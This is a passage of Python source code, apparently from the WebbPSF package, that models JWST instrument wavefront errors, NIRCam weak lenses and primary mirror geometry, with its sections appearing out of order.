= 'Guider' + instrument.detector[3] else: lookup_name = instrument.name _log.debug("Retrieving Zernike coefficients for " + lookup_name) self.tel_coords = instrument._tel_coords() # load the Zernikes table here zfile = "si_zernikes_isim_cv3.fits" # Check special case NIRCam coronagraphy if is_nrc_coron: zfile = "si_zernikes_coron_wfe.fits" zernike_file = os.path.join(utils.get_webbpsf_data_path(), zfile) if not os.path.exists(zernike_file): raise RuntimeError("Could not find Zernike coefficients file {} \ in WebbPSF data directory".format(zfile)) else: self.ztable_full = Table.read(zernike_file) npix, self.pixelscale = _get_initial_pupil_sampling(self.instrument) self.ztable = self.ztable_full[self.ztable_full['instrument'] == lookup_name] # Figure out the closest field point telcoords_am = self.tel_coords.to(units.arcmin).value v2 = self.ztable['V2'] v3 = self.ztable['V3'] r = np.sqrt((telcoords_am[0] - v2) ** 2 + (telcoords_am[1] - v3) ** 2) closest = np.argmin(r) # Save closest ISIM CV3 WFE measured field point for reference self.row = self.ztable[closest] self.name = "{instrument} internal WFE at V2V3=({v2:.2f},{v3:.2f})', near {field_point}".format( instrument=lookup_name, field_point=self.row['field_point_name'], v2=telcoords_am[0], v3=telcoords_am[1] ) self.si_wfe_type = ("Interpolated", "SI WFE was interpolated between available meas.") # Retrieve those Zernike coeffs # Field point interpolation v2_tel, v3_tel = telcoords_am coeffs = [] for i in range(1, 37): zkey = 'Zernike_{}'.format(i) zvals = self.ztable[zkey] # Cubic interpolation of of non-uniform 2D grid cf = griddata((v2, v3), zvals, (v2_tel, v3_tel), method='cubic').tolist() # Want to perform extrapolation if field point outside of bounds if np.isnan(cf): if i==1: self.si_wfe_type = ("Extrapolated", "SI WFE was extrapolated outside available meas.") # To extrapolate outside the measured field points, we proceed # in two steps. This first creates a fine-meshed cubic fit # over the known field points, fixes any NaN's using # RegularGridInterpolator, then again uses RegularGridInterpolator # on the fixed data to extrapolate the requested field point. # In principle, the first call of RegularGridInterpolator can be # used to extrapolate the requested field point to eliminate # the intermediate step, but this method enables use of all the # real data rather than the trimmed data set. RGI is a rather # quick process, so added overheads should be negligible. # Full field V2/V3 limits for each instrument. # Produces better initial extrapolation with fewer # interpolation artifacts in RGI. if lookup_name == 'Guider1': v2_min, v2_max, v3_min, v3_max = (2.2, 4.7, -12.9, -10.4) elif lookup_name == 'Guider2': v2_min, v2_max, v3_min, v3_max = (-0.8, 1.6, -12.9, -10.4) elif lookup_name == 'NIRISS': v2_min, v2_max, v3_min, v3_max = (-6.0, -3.6, -12.9, -10.4) elif lookup_name == 'MIRI': v2_min, v2_max, v3_min, v3_max = (-8.3, -6.1, -7.3, -5.2) elif lookup_name == 'NIRSpec': v2_min, v2_max, v3_min, v3_max = (3.7, 9.0, -9.8, -4.5) elif (lookup_name == 'NIRCamLWA') or (lookup_name == 'NIRCamSWA'): v2_min, v2_max, v3_min, v3_max = (0.2, 2.7, -9.5, -7.0) elif (lookup_name == 'NIRCamLWB') or (lookup_name == 'NIRCamSWB'): v2_min, v2_max, v3_min, v3_max = (-2.7, -0.2, -9.5, -7.0) else: v2_min, v2_max, v3_min, v3_max = (v2.min(), v2.max(), v3.min(), v3.max()) # For NIRCam coronagraphy, add 50" to V3 limits if is_nrc_coron: v3_min += 50. / 60. v3_max += 50. / 60. # Create fine mesh grid dstep = 1. / 60. # 1" steps xgrid = np.arange(v2_min, v2_max+dstep, dstep) ygrid = np.arange(v3_min, v3_max+dstep, dstep) X, Y = np.meshgrid(xgrid,ygrid) # Cubic interpolation of all points # Will produce a number of NaN's that need to be extrapolated over zgrid = griddata((v2, v3), zvals, (X, Y), method='cubic') # Want to rotate zgrid image of some SIs to minimize NaN clipping if 'NIRSpec' in lookup_name: rot_ang = 43 elif 'MIRI' in lookup_name: rot_ang = -5 elif 'NIRISS' in lookup_name: rot_ang = 2 else: rot_ang = 0 # Fix the NaN's within zgrid array # Perform specified rotation for certain SIs # Trim rows/cols zgrid = _fix_zgrid_NaNs(xgrid, ygrid, zgrid, rot_ang=rot_ang) # Create final function for extrapolation func = RegularGridInterpolator((ygrid,xgrid), zgrid, method='linear', bounds_error=False, fill_value=None) # Extrapolate at requested (V2,V3) coordinates cf = func( (v3_tel, v2_tel) ).tolist() coeffs.append(cf) self.zernike_coeffs = coeffs # Generate an OPD on the same sampling as the input wavefront - # but implicitly inverted in coordinate system # to match the OTE exit pupil orientation if include_oversize: # Try to model the oversized gaps around the internal pupils. # This is only relevant if you are trying to model pupil shear or rotations, # and in general we don't have good WFE data outside the nominal pupil anyway # so let's leave this detail off by default. # internal pupils for NIRISS and MIRI instruments are 4 percent # oversized tricontagons if self.instrument.name == "NIRISS": self.amplitude = fits.getdata(os.path.join( utils.get_webbpsf_data_path(), 'tricontagon_oversized_4pct.fits.gz') ) # cut out central region to match the OPD, which is hard coded # to 1024 self.amplitude = self.amplitude[256:256 + 1024, 256:256 + 1024] elif self.instrument.name == "MIRI": self.amplitude = fits.getdata(os.path.join( utils.get_webbpsf_data_path(), 'MIRI', 'optics', 'MIRI_tricontagon_oversized_rotated.fits.gz') ) else: # internal pupil is a 4 percent oversized circumscribing circle? # For NIRCam: # John stansberry 2016-09-07 reports "It is definitely oversized, but isn't really # circular... Kinda vaguely 6-sided I guess. [...] I can dig up # a drawing and/or some images that show the pupil stop." y, x = np.indices((npix, npix), dtype=float) y -= (npix - 1) / 2.0 x -= (npix - 1) / 2.0 r = np.sqrt(y ** 2 + x ** 2) self.amplitude = (r < (npix - 1) / 2.0 * 1.04).astype(int) self.opd = poppy.zernike.opd_from_zernikes( coeffs, npix=npix, aperture=self.amplitude, outside=0 ) else: self.opd = poppy.zernike.opd_from_zernikes( coeffs, npix=npix, outside=0 ) self.amplitude = (self.opd != 0).astype(int) def header_keywords(self): """ Return info we would like to save in FITS header of output PSFs """ from collections import OrderedDict keywords = OrderedDict() keywords['SIWFETYP'] = self.si_wfe_type keywords['SIWFEFPT'] = (self.row['field_point_name'], "Closest ISIM CV3 WFE meas. field point") for i in range(1, 36): keywords['SIZERN{}'.format(i)] = (self.zernike_coeffs[i - 1], "[m] SI WFE coeff for Zernike term {}".format(i)) return keywords # wrapper just to change default vmax def display(self, *args, **kwargs): if 'opd_vmax' not in kwargs: kwargs.update({'opd_vmax': 2.5e-7}) return super(WebbFieldDependentAberration, self).display(*args, **kwargs) class NIRSpecFieldDependentAberration(WebbFieldDependentAberration): """ Subclass that adds to the above the division into fore-optics and spectrograph optics for NIRSpec. The available end-to-end optical test data for NIRSpec from ISIM CV3 do not allow distinguishing which optical planes have which amounts of aberration. However, the NIRSpec team performed extensive metrology during the assembly of NIRSpec FM2, both of individual components and of the assembled system using a shack hartmann WFS temporarily placed within the optical system. [should add document number here to the report with those data!] Based on those data, Maurice Te Plate recommended to Marshall Perrin that the CV3 WFE should be apportioned 1/3 to the fore-optics and 2/3 to the spectrograph optics (collimator & camera). Given the uncertainties and available data that seems sufficiently precise for current purposes. """ def __init__(self, instrument, where='fore', **kwargs): super(NIRSpecFieldDependentAberration, self).__init__(instrument, **kwargs) if where == 'fore': self.name = 'NIRSpec fore-optics WFE, near {}'.format(self.row['field_point_name']) self.scalefactor = 1. / 3 else: self.name = 'NIRSpec spectrograph WFE, near {}'.format(self.row['field_point_name']) self.scalefactor = 2. / 3 # apply scale factor to split up the OPD, and that's all we need to do. self.opd *= self.scalefactor class NIRCamFieldAndWavelengthDependentAberration(WebbFieldDependentAberration): """ Subclass that adds to the above the wavelength dependent variation in defocus for NIRCam. The model for this is based on NIRCam models and ISIM CV2 test data, as provided by Randal Telfer to Marshall Perrin. It uses a combination of model design predictions continuously at all wavelengths based on the properties of the glasses in the refractive optical design, plus some small tweaks to achieve better agreement with the CV test measurements of defocus at a small subset of wavelengths. """ def __init__(self, instrument, **kwargs): super( NIRCamFieldAndWavelengthDependentAberration, self).__init__( instrument, **kwargs) # Polynomial equations fit to defocus model. Wavelength-dependent focus # results should correspond to Zernike coefficients in meters. # Fits were performed to the SW and LW optical design focus model # as provided by Randal Telfer. # See plot at https://github.com/spacetelescope/webbpsf/issues/179 # The relative wavelength dependence of these focus models are very # similar for coronagraphic mode in the Zemax optical prescription, # so we opt to use the same focus model in both imaging and coronagraphy. defocus_to_rmswfe = -1.09746e7 # convert from mm defocus to meters (WFE) sw_focus_cf = np.array([-5.169185169, 50.62919436, -201.5444129, 415.9031962, -465.9818413, 265.843112, -59.64330811]) / defocus_to_rmswfe lw_focus_cf = np.array([0.175718713, -1.100964635, 0.986462016, 1.641692934]) / defocus_to_rmswfe self.fm_short = np.poly1d(sw_focus_cf) self.fm_long = np.poly1d(lw_focus_cf) # Coronagraphic tilt (`ctilt`) offset model # Primarily effects the LW channel (approximately a 0.031mm diff from 3.5um to 5.0um). # SW module is small compared to LW, but we include it for completeness. # Values have been determined using the Zernike offsets as reported in the # NIRCam Zemax models. The center reference positions will correspond to the # NIRCam target acquisition filters (3.35um for LW and 2.1um for SW) sw_ctilt_cf = np.array([125.849834, -289.018704]) / 1e9 lw_ctilt_cf = np.array([146.827501, -2000.965222, 8385.546158, -11101.658322]) / 1e9 self.ctilt_short = np.poly1d(sw_ctilt_cf) self.ctilt_long = np.poly1d(lw_ctilt_cf) # Get the representation of focus in the same Zernike basis as used for # making the OPD. While it looks like this does more work here than needed # by making a whole basis set, in fact because of caching behind the scenes # this is actually quick basis = poppy.zernike.zernike_basis_faster( nterms=len(self.zernike_coeffs), npix=self.opd.shape[0], outside=0 ) self.defocus_zern = basis[3] self.tilt_zern = basis[2] def get_opd(self, wave): """ Parameters ---------- wave : float or obj either a scalar wavelength (meters) or a Wavefront object """ if isinstance(wave, poppy.Wavefront): wavelength = wave.wavelength else: wave = poppy.Wavefront(wavelength=float(wave)) wavelength = wave.wavelength # Check for coronagraphy pupil_mask = self.instrument._pupil_mask is_nrc_coron = (pupil_mask is not None) and ( ('LYOT' in pupil_mask.upper()) or ('MASK' in pupil_mask.upper()) ) # Which wavelength was used to generate the OPD map we have already # created from zernikes? if self.instrument.channel.upper() == 'SHORT': focusmodel = self.fm_short opd_ref_wave = 2.12 opd_ref_focus = focusmodel(opd_ref_wave) else: focusmodel = self.fm_long opd_ref_wave = 3.23 # All LW WFE measurements were made using F323N, # which has it's own focus that deviates from focusmodel(). # But only do this for direct imaging SI WFE values, # because coronagraph WFE was measured in Zemax (no additional focus power). if is_nrc_coron: opd_ref_focus = focusmodel(opd_ref_wave) else: opd_ref_focus = 1.206e-7 # Not coronagraphy (e.g., imaging) # If F323N or F212N, then no focus offset necessary wave_um = wavelength.to(units.micron).value if ('F323N' in self.instrument.filter) or ('F212N' in self.instrument.filter): deltafocus = 0 else: deltafocus = focusmodel(wave_um) - opd_ref_focus _log.info(" Applying OPD focus adjustment based on NIRCam focus vs wavelength model") _log.info(" Modified focus from {} to {} um: {:.3f} nm wfe".format( opd_ref_wave, wave_um, -deltafocus * 1e9) ) # Apply defocus mod_opd = self.opd - deltafocus * self.defocus_zern # Apply wavelength-dependent tilt offset for coronagraphy # We want the reference wavelength to be that of the target acq filter # Final offset will position TA ref wave at the OPD ref wave location # (wave_um - opd_ref_wave) - (ta_ref_wave - opd_ref_wave) = wave_um - ta_ref_wave if is_nrc_coron: if self.instrument.channel.upper() == 'SHORT': ctilt_model = self.ctilt_short ta_ref_wave = 2.10 else: ctilt_model = self.ctilt_long ta_ref_wave = 3.35 tilt_offset = ctilt_model(wave_um) - ctilt_model(ta_ref_wave) _log.info(" Applying OPD tilt adjustment based on NIRCam tilt vs wavelength model") _log.info(" Modified tilt from {} to {} um: {:.3f} nm wfe".format( ta_ref_wave, wave_um, tilt_offset * 1e9) ) # Apply tilt offset mod_opd = mod_opd + tilt_offset * self.tilt_zern rms = np.sqrt((mod_opd[mod_opd != 0] ** 2).mean()) _log.info(" Resulting OPD has {:.3f} nm rms".format(rms * 1e9)) return mod_opd class MIRIFieldDependentAberrationAndObscuration(WebbFieldDependentAberration): """ Subclass that adds to the above the field dependent obscuration from the MIRI internal calibration source pickoff mirror. The model for this was derived by Randal Telfer based on the optical model file OTE_MIRI_20150223.seq, provided by Scott Rohrbach. In this case we do turn on by default the tricontagon outline since we have to worry about pupil shape anyway. """ def __init__(self, instrument, include_oversize=True, **kwargs): super(MIRIFieldDependentAberrationAndObscuration, self).__init__( instrument, include_oversize=include_oversize, **kwargs ) # figure out the XAN, YAN coordinates in degrees, # since that is what Randal's linear model expects xanyan = instrument._xan_yan_coords().to(units.degree) xan = xanyan[0].value yan = xanyan[1].value # Telfer: # Here is the matrix that reproduces the projection of the # obscuration on the primary mirror, V2-V3 coordinates and # radius in mm, as a function of XAN,YAN in degrees. # So, V2 is: # # V2 = -20882.636 * XAN -680.661 * YAN - 1451.682. # # XAN YAN Const # V2 -20882.636 -680.661 -1451.682 # V3 815.955 26395.552 -2414.406 # Rad 176.864 -392.545 626.920 # we implement the above here, and convert the outputs to meters: self.obsc_v2 = (-20882.636 * xan - 680.661 * yan - 1451.682) * 0.001 self.obsc_v3 = (815.955 * xan + 26395.552 * yan - 2414.406) * 0.001 self.obsc_r = (176.864 * xan - 392.545 * yan + 626.920) * 0.001 # generate coordinates. N.B. this assumed hard-coded pixel scale and # array size. pixel_scale = constants.JWST_CIRCUMSCRIBED_DIAMETER / 1024 y, x = poppy.Wavefront.pupil_coordinates((1024, 1024), pixel_scale) # Now, the v2 and v3 coordinates calculated above are as projected back to # the OTE entrance pupil # But the OTE exit pupil as seen at the MIRI internal pupil is rotated by # 5 degrees with respect to that, and flipped in handedness as well # (but only in V3, given webbpsf axes conventions relative to the definition of the V frame) # Therefore we must transform the v2 and v3 to match the wavefront coords at the # intermediate plane. angle = np.deg2rad(instrument._rotation) proj_v2 = np.cos(angle) * self.obsc_v2 - np.sin(angle) * self.obsc_v3 proj_v3 = -np.sin(angle) * self.obsc_v2 + np.cos(angle) * self.obsc_v3 # handle V3 flip from OTE entrance to exit pupils # no flip needed for V2 since that's already implicitly done between # the V frame looking "in" to the OTE vs WebbPSF simulations looking # "out" from the detector toward the sky. proj_v3 *= -1 mask = np.sqrt((y - proj_v3) ** 2 + (x - proj_v2) ** 2) < self.obsc_r self.amplitude[mask] = 0 # No need to subclass any of the methods; it's sufficient to set the custom # amplitude mask attribute value. # Alternative implementation that just reads OPDs from some file class LookupTableFieldDependentAberration(poppy.OpticalElement): """ Retrieve OPDs from a lookup table over many field points. This is pretty much a hack, hard-coded for a specific data delivery from Ball! Intended for OTE team WFR4 and MIMF KDP Practice data prep, not generalized beyond that. Parameters ----------- add_niriss_defocus: bool add 0.8 microns PTV defocus to NIRISS only (for WFR4 test) rm_ptt: bool Remove piston, tip, tilt rm_center_ptt : bool If rm_ptt, use the center value for each detector rather than per field point nwaves: float Number of waves to defocus SM, if add_sm_defocus_pos or add_sm_defocus_neg is True. add_sm_defocus: bool If True, add "nwaves" of SM defocus, measured at a reference wavelength of 2.0 microns. Usage: ------ inst = webbpsf.NIRCam() # or any other SI inst._si_wfe_class = LookupTableFieldDependentAberration() """ def __init__(self, instrument, field_points_file=None, phasemap_file=None, which_exercise='MIMF_KDP_2', add_niriss_defocus=None, rm_ptt=None, rm_center_ptt=None, add_mimf_defocus=False, add_sm_defocus=False, nwaves=None, **kwargs): super().__init__( name="Aberrations", **kwargs ) import warnings self.instrument = instrument self.instr_name = instrument.name self.instrument.pupilopd=None # Do not add in the usual telescope WFE on top of this; # This model provided by Ball includes both the telescope and the SI WFE combined. self.rm_ptt = rm_ptt self.which_exercise = which_exercise if self.which_exercise == 'WFR4': add_niriss_defocus=True rm_ptt = True rm_center_ptt = True elif self.which_exercise == 'MIMF_KDP': add_niriss_defocus=False rm_ptt = False rm_center_ptt = False elif self.which_exercise == 'LRE4' or self.which_exercise == 'LRE4-OTE26': add_niriss_defocus=False rm_ptt = False rm_center_ptt = False elif self.which_exercise == 'MIMF_KDP_2': add_niriss_defocus=False rm_ptt = False rm_center_ptt = False if self.instr_name =='NIRCam': self.instr_name += " "+self.instrument.module elif self.instr_name == 'FGS': self.instr_name = self.instrument.detector self.tel_coords = instrument._tel_coords() # load the OPD lookup map table (datacube) here import webbpsf.constants if self.which_exercise == 'WFR4': fp_path = '/ifs/jwst/tel/wfr4_mirage_sims/phase_maps_from_ball/' if field_points_file is None: field_points_file = fp_path + 'The_Field_Coordinates.txt' if phasemap_file is None: phasemap_file = fp_path + 'phase_maps.fits' self.phasemap_file = phasemap_file self.table = Table.read(field_points_file, format='ascii', names=('V2', 'V3')) self.yoffset = -7.8 self.table['V3'] += self.yoffset # Correct from -YAN to actual V3 self.phasemaps = fits.getdata(phasemap_file) self.phasemap_pixelscale = webbpsf.constants.JWST_CIRCUMSCRIBED_DIAMETER/256 * units.meter / units.pixel resample = True elif self.which_exercise == 'MIMF_KDP': fp_path = '/ifs/jwst/tel/MIMF_KDP_Practice/Ball_Phase_Maps/' field_points_file = fp_path + 'coordinates.txt' self.table = Table.read(field_points_file, format='ascii.basic', names=('XWAS', 'YWAS')) # Convert coordinate table to V2V3 in arcminutes self.table['V2'] = -self.table['XWAS'] self.table['V3'] = self.table['YWAS'] - 468/60 phasemap_file = fp_path + 'all_26Feb2021.fits' self.phasemaps = fits.getdata(phasemap_file) self.phasemaps = self.phasemaps.reshape(7*11*11, 256, 256) self.phasemap_pixelscale = webbpsf.constants.JWST_CIRCUMSCRIBED_DIAMETER / 256 * units.meter / units.pixel resample = True elif self.which_exercise == 'LRE4' or self.which_exercise == 'LRE4-OTE26': fp_path = '/ifs/jwst/tel/LRE4/from_ball/' if self.which_exercise == 'LRE4': field_points_file = fp_path + 'coordinates.ecsv' phasemap_file = fp_path + 'rescaled_opds_for_OTE-25.2.fits' elif self.which_exercise == 'LRE4-OTE26': field_points_file = fp_path + 'coordinates-ote26.ecsv' phasemap_file = fp_path + 'rescaled_opds_for_OTE-26.fits' self.table = Table.read(field_points_file) self.phasemaps = fits.getdata(phasemap_file) # Phase maps have been pre-zoomed in this case by the import notebook resample = False self.phasemap_pixelscale = webbpsf.constants.JWST_CIRCUMSCRIBED_DIAMETER / 1024 * units.meter / units.pixel elif self.which_exercise == 'MIMF_KDP_2': fp_path = '/ifs/jwst/tel/MIMF_KDP_Practice_Sept2021/Ball_Phase_Maps/' # Convert coordinate table to V2V3 in arcminutes xcoords = fits.getdata(fp_path+"xcor.fits") ycoords = fits.getdata(fp_path+"ycor.fits") V2 = -xcoords.flatten() V3 = ycoords.flatten() - 468/60 self.table = Table([V2,V3], names=['V2','V3']) phasemap_file = fp_path + 'complete_wf.fits' self.phasemaps = fits.getdata(phasemap_file) self.phasemaps = self.phasemaps.reshape(7*11*11, 256, 256) self.phasemap_pixelscale = webbpsf.constants.JWST_CIRCUMSCRIBED_DIAMETER / 256 * units.meter / units.pixel resample = True self.phasemap_file = phasemap_file # Determine the pupil sampling of the first aperture in the # instrument's optical system if isinstance(instrument.pupil, poppy.OpticalElement): # This branch needed to handle the OTE Linear Model case self.pixelscale = instrument.pupil.pixelscale else: # these branches to handle FITS files, by name or as an object if isinstance(instrument.pupil, fits.HDUList): pupilheader = instrument.pupil[0].header else: pupilfile = os.path.join(instrument._datapath, "OPD", instrument.pupil) pupilheader = fits.getheader(pupilfile) self.pixelscale = pupilheader['PUPLSCAL'] * units.meter / units.pixel # Figure out the closest field point telcoords_am = self.tel_coords.to(units.arcmin).value print(f"Requested field point has coord {telcoords_am}") v2 = self.table['V2'] v3 = self.table['V3'] r = np.sqrt((telcoords_am[0] - v2) ** 2 + (telcoords_am[1] - v3) ** 2) closest = np.argmin(r) # if there are two field points with identical coords or equal distance just one is returned print(f"Closest field point is row {closest}:\n{self.table[closest]}") # Save closest ISIM CV3 WFE measured field point for reference self.row = self.table[closest] self.name = "{instrument} at V2V3=({v2:.2f},{v3:.2f}) Lookup table WFE from ({v2t:.2f},{v3t:.2f})".format( instrument=self.instr_name, v2=telcoords_am[0], v3=telcoords_am[1], v2t=self.row['V2'], v3t=self.row['V3'] ) self.si_wfe_type = ("Lookup Table", "SI + OTE WFE from supplied lookup table of phase maps.") # Retrieve the phase map phasemap = self.phasemaps[closest] # The phase maps are provided in OTE entrance pupil orientation, however we need it to be # in exit pupil orientation, so flip it vertically here. phasemap = phasemap[::-1] print("Flipped input phase map vertically into exit pupil orientation.") if resample: if phasemap.shape[0] != 256: raise NotImplementedError("Hard coded for Ball delivery of 256 pixel phase maps") # Resample to 1024 across, by replicating each pixel into a 4x4 block resample_factor = 4 phasemap_big = np.kron(phasemap, np.ones((resample_factor,resample_factor))) else: # no resampling / zooming needed phasemap_big = phasemap self.opd = phasemap_big * 1e-6 # Convert from microns to meters self.amplitude = np.ones_like(self.opd) if rm_ptt: apmask = self.opd != 0 if rm_center_ptt: # Remove the PTT values at the center of each instrument, rather than per field point. This # leaves in the field dependence but takes out the bulk offset # These values are just a precomputed lookup table of the coefficients returned by the # opd_expand_nonorthonormal call just below, for the center field point on each. coeffs_per_si = {"NIRCam A": [-3.50046880e-10, -7.29120639e-08, -1.39751567e-08], "NIRCam B": [-2.45093780e-09, -2.51804001e-07, -2.64821753e-07], "NIRISS": [-1.49297771e-09, -2.11111038e-06, -3.99881993e-07], "FGS1": [ 9.86180620e-09, -5.94041500e-07, 1.18953161e-06], "FGS2": [ 4.84327424e-09, -8.24285481e-07, 5.09791593e-07], "MIRI": [-8.75766849e-09, -1.27850277e-06, -1.03467567e-06],} coeffs = coeffs_per_si[self.instr_name] else: coeffs = poppy.zernike.opd_expand_nonorthonormal(self.opd, aperture=apmask, nterms=3) ptt_only = poppy.zernike.opd_from_zernikes(coeffs, aperture=apmask, npix=self.opd.shape[0], outside=0) self.opd -= ptt_only print(f"Removing piston, tip, tilt from the input wavefront. Coeffs for {self.instr_name}: {coeffs},") if add_mimf_defocus: self.instrument.options['defocus_waves'] = 0.8 self.instrument.options['defocus_wavelength'] = 1e-6 # Add 0.8 microns PTV defocus if add_niriss_defocus and self.instr_name=='NIRISS': # The Ball delivery was supposed to have defocused NIRISS for rehearsal purposes, but didn't. # So fix that here. self.instrument.options['defocus_waves'] = 0.8 self.instrument.options['defocus_wavelength'] = 1e-6 # Add 0.8 microns PTV defocus warnings.warn("Adding defocus=0.8 waves for NIRISS!") if add_sm_defocus: if nwaves: print("ADDING DEFOCUS {:4.1f} WAVES at 2.0 microns".format(nwaves)) self.instrument.options['defocus_waves'] = nwaves self.instrument.options['defocus_wavelength'] = 2.0e-6 else: print("Not adding any defocus; set nwaves") def header_keywords(self): """ Return info we would like to save in FITS header of output PSFs """ from collections import OrderedDict keywords = OrderedDict() keywords['SIWFETYP'] = self.si_wfe_type keywords['SIWFEFPT'] = ( f"{self.row["V2"]:.3f}, {self.row["V3"]:.3f}", "Closest lookup table meas. field point") keywords['SIWFEFIL'] = self.phasemap_file return keywords # wrapper just to change default vmax def display(self, *args, **kwargs): if 'opd_vmax' not in kwargs: kwargs.update({'opd_vmax': 2.5e-7}) return super().display(*args, **kwargs) class NIRCamFieldDependentWeakLens(poppy.OpticalElement): """Higher-fidelity model of NIRCam weak lens(es), based on calibrated as-built performance and field dependence. Includes field-dependent variations in defocus power, and in astigmatism. Includes variation of the +4 lens' effective OPD when used in a pair with either the +8 or -8 lens. These are modeled as the specific values from the nearest neighbor ISIM CV calibration point, with no interpolation between them included at this time. See R. Telfer, 'NIRCam Weak Lens Characterization and Performance', JWST-REF-046515 Parameters ----------- name : str WLP8, WLM8, WLP4, WLM4, WLP12. center_fp_only : bool For debugging; override to set no field dependence and just use the average center field point power include_power, include_astigmatism : bool Can be used to selectively enable/disable parts of the optical model. Intended for debugging; should no need to be set by users in general. """ def __init__(self, name='WLP8', instrument=None, center_fp_only=False, verbose=False, include_power=True, include_astigmatism=True, **kwargs): super().__init__(name=name) self.ref_wavelength = 2.12e-6 # reference wavelength for defocus self.verbose = verbose if instrument is None: self.module = 'A' self.v2v3_coords = (0, -468 / 60) npix = 1024 else: self.module = instrument.module self.v2v3_coords = instrument._tel_coords() npix, pixelscale = _get_initial_pupil_sampling(instrument) self.ztable_full = None ## REFERENCE: # NIRCam weak lenses, values from WSS config file, PRDOPSFLT-027 # A B # WLP4_diversity = 8.27309 8.3443 diversity in microns # WLP8_diversity = 16.4554 16.5932 # WLM8_diversity = -16.4143 -16.5593 # WL_wavelength = 2.12 Wavelength, in microns if center_fp_only or instrument is None: # use the center field point power only. No field dependence # Power in P-V waves at center field point in optical model # JWST-REF-046515, table 2 Mod A: Mod B: power_at_center_fp = {'WLM8': (-8.0188, -7.9521), 'WLM4': (-4.0285, -3.9766), 'WLP4': (3.9797, 3.9665), 'WLP8': (8.0292, 7.9675), 'WLP12': (12.0010, 11.9275)} power_pv = power_at_center_fp[self.name][0 if self.module == 'A' else 1] astig0 = 0 astig45 = 0 else: closest_fp = self.find_closest_isim_fp_name(instrument) if verbose: print(closest_fp) power_pv, astig0, astig45 = self.lookup_empirical_lens_power(name, closest_fp) self.power_pv_waves = power_pv pv2rms_norm = self.ref_wavelength / (2 * np.sqrt(3)) # convert desired PV waves to RMS microns for power # since the below function wants inputs in RMS self.power_rms_microns = power_pv * pv2rms_norm zernike_coefficients = np.zeros(6) if include_power: zernike_coefficients[3] = self.power_rms_microns if include_astigmatism: zernike_coefficients[4] = astig0 zernike_coefficients[5] = astig45 self.zernike_coefficients = zernike_coefficients self.opd = poppy.zernike.opd_from_zernikes( zernike_coefficients, npix=npix, outside=0 ) self.amplitude = np.ones_like(self.opd) def find_closest_isim_fp_name(self, instr): """Find the closest ISIM CV field point to a given instrument object, i.e. the field point closest to the configured detector and coordinates """ if self.ztable_full is None: zernike_file = os.path.join(utils.get_webbpsf_data_path(), "si_zernikes_isim_cv3.fits") self.ztable_full = Table.read(zernike_file) lookup_name = f"NIRCam{instr.channel.upper()[0]}W{instr.module}" ztable = self.ztable_full[self.ztable_full['instrument'] == lookup_name] self._ztable = ztable self._instr = instr telcoords_am = instr._tel_coords().to(units.arcmin).value if self.verbose: print(telcoords_am) r = np.sqrt((telcoords_am[0] - ztable['V2']) ** 2 + (telcoords_am[1] - ztable['V3']) ** 2) # Save closest ISIM CV3 WFE measured field point for reference row = ztable[r == r.min()] return row['field_point_name'] def lookup_empirical_lens_power(self, lens_name, field_point_name): """ Lookup lens power and astigmatism versus field position, from empirical calibrations from ISIM CV testing """ mypath = os.path.dirname(os.path.abspath(__file__)) + os.sep wl_data_file = os.path.join(mypath, 'otelm', 'NIRCam_WL_Empirical_Power.csv') wl_data = Table.read(wl_data_file, comment='#', header_start=1) field_point_row = wl_data[wl_data['Field'] == field_point_name] if self.verbose: print(field_point_row) defocus_name = lens_name[2:] power = field_point_row[defocus_name].data[0] # Fringe zernike coefficients, from Telfer's table z5 = field_point_row[defocus_name+"_Z5"].data[0] z6 = field_point_row[defocus_name + "_Z6"].data[0] # Have to convert Zernike normalization and order from fringe to noll, and nanometers to meters astig0 = z6 / np.sqrt(6)*1e-9 astig45 = z5 / np.sqrt(6)*1e-9 if self.verbose: print(power) return power, astig0, astig45
import os import poppy import poppy.utils import numpy as np import matplotlib import matplotlib.pyplot as plt from astropy.table import Table import astropy.io.fits as fits import astropy.units as units from scipy.interpolate import griddata, RegularGridInterpolator from scipy.ndimage import rotate from . import utils from . import constants import logging _log = logging.getLogger('webbpsf') import pysiaf ####### Classes for modeling aspects of JWST's segmented active primary ##### def segment_zernike_basis(segnum=1, nterms=15, npix=512, outside=np.nan): """ Basis set in the style of poppy.zernike.zernike_basis for segment-level Zernike polynomials for one segment at a time in JWST's aperture. Parameters ------------ segnum : integer 1 to 18, number of JWST segment. Uses same numbering convention as the WSS. nterms : integer Number of Zernike polynomial terms to return npix : integer Number of pixels per side of the array outside : float Value to fill the array with outside of the valid segment. """ from .webbpsf_core import segname aper = WebbPrimaryAperture(label_segments=True) w = poppy.Wavefront( npix=npix, diam=constants.JWST_CIRCUMSCRIBED_DIAMETER ) segmask = aper.get_transmission(w) segname = segname(segnum) cenx, ceny = aper.seg_centers[segname] # nominal point to point diam for A and B segments; # ignoring slight departures from ideal hexes for now. seg_radius = constants.JWST_SEGMENT_RADIUS y, x = w.coordinates() r = np.sqrt((y - ceny) ** 2 + (x - cenx) ** 2) / seg_radius theta = np.arctan2((y - ceny) / seg_radius, (x - cenx) / seg_radius) r[segmask != segnum] = np.nan theta[segmask != segnum] = np.nan wg = np.where(segmask == segnum) outzerns = np.full((nterms, npix, npix), outside, dtype=float) outzerns_tmp = poppy.zernike.zernike_basis( nterms=nterms, rho=r[wg], theta=theta[wg], outside=outside ) for iz in range(nterms): outzerns[iz][wg] = outzerns_tmp[iz] return outzerns class WebbPrimaryAperture(poppy.AnalyticOpticalElement): """ The JWST telescope primary mirror geometry, in all its hexagonal obscured complexity. Note this has **just the aperture shape** and not any wavefront error terms. JWST design pupil geometry and segment coordinates taken from Paul Lightsey's spreadsheet: "2010.03.16 Transmission X Area Budget.xls". That document was in turn based on Ball Aerospace drawing 2220169 Rev B, and the OTE Cryogenic Optics ICD, BATC doc # C327693. This class has no wavefront errors, it's just the pupil geometry including the segments (which are not quite perfect hexagons for manufacturing reasons related to trying to tile a curved surface with hexagons while maintaining uniform clearance between adjacent segments) and the secondary mirror support struts, including the bumps on the +V3 strut for the mid boom hinge and mag dampers. .. warning:: At high sampling factors, PSF calculations become a LOT slower. By default, this produces an aperture with values 0 and 1 for the transmission. By setting the parameter label_segments=True, you can instead have it generate a map of which segment number is in which location. """ def __init__(self, name="WebbPrimaryAperture", label_segments=False, **kwargs): super(WebbPrimaryAperture, self).__init__(name=name, **kwargs) self.label_segments = label_segments self.segdata = constants.JWST_PRIMARY_SEGMENTS self.strutdata = constants.JWST_PRIMARY_STRUTS self.seg_centers = dict(constants.JWST_PRIMARY_SEGMENT_CENTERS) def get_transmission(self, wave): segpaths = {} 